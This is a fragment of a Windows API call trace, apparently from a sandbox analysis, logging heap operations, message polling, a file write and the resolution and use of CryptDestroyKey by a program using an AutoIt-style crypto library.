(HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0129.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa918) returned 0x2eaac60 [0129.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0129.681] WriteFile (in: hFile=0x2a0, lpBuffer=0x2eaac60*, nNumberOfBytesToWrite=0xa918, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2eaac60*, lpNumberOfBytesWritten=0x8cf5e4*=0xa918, lpOverlapped=0x0) returned 1 [0129.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0129.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2eaac60 | out: hHeap=0x970000) returned 1 [0129.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0129.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0129.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0129.686] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0129.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0129.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0129.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0129.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0129.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0129.686] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0129.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0129.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0129.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0129.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0129.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0129.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0129.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0129.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0129.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0129.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0129.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0129.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0129.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0129.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0129.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0129.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0129.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0129.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0129.687] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0129.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0129.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0129.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0129.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e98 [0129.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0129.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0129.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0129.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0129.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0129.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0129.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0129.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0129.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0129.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0129.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0129.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0129.688] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0129.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0129.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0129.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0129.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0129.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0129.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0129.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0129.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0129.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0129.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0129.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0129.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0129.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0129.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0129.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0129.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0129.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0129.688] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0129.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0129.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0129.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0129.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0129.689] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0129.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0129.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0129.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0129.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0129.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0129.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0129.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0129.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0129.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0129.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0129.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0129.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0129.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0129.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0129.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0129.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0129.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0129.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0129.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0129.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0129.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0129.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0129.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0129.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0129.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0129.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0129.691] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0129.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0129.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0129.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0129.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0129.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0129.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0129.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0129.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0129.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0129.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0129.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0129.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0129.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0129.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0129.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0129.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0129.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0129.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0129.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0129.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0129.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0129.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0129.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e509b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0129.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0129.692] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0129.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0129.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0129.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0129.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0129.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0129.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0129.693] CryptDestroyKey (hKey=0xa87590) returned 1 [0129.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0129.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0129.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0129.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0129.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0129.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0129.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0129.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0129.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0129.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0129.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0129.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0129.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0129.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0129.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0129.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0129.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0129.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0129.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0129.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0129.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0129.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0129.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0129.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0129.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0129.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0129.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0129.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0129.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0129.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0129.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0129.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0129.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0129.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0129.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0129.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0129.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0129.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0129.694] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0129.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0129.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0129.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0129.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0129.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0129.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0129.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0129.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0129.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0129.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0129.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0129.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0129.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0129.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0129.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0129.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0129.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0129.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0129.695] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0129.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0129.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0129.695] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0129.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0129.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0129.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0129.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0129.696] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0129.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0129.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0129.696] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0129.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0129.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0129.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0129.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0129.696] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0129.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0129.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0129.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0129.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0129.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0129.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0129.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0129.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0129.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0129.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0129.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0129.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0129.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0129.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0129.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0129.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0129.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0129.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0129.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0129.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0129.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0129.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0129.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0129.697] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0129.697] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0129.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0129.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0129.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0129.697] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0129.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0129.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0129.697] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0129.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0129.697] 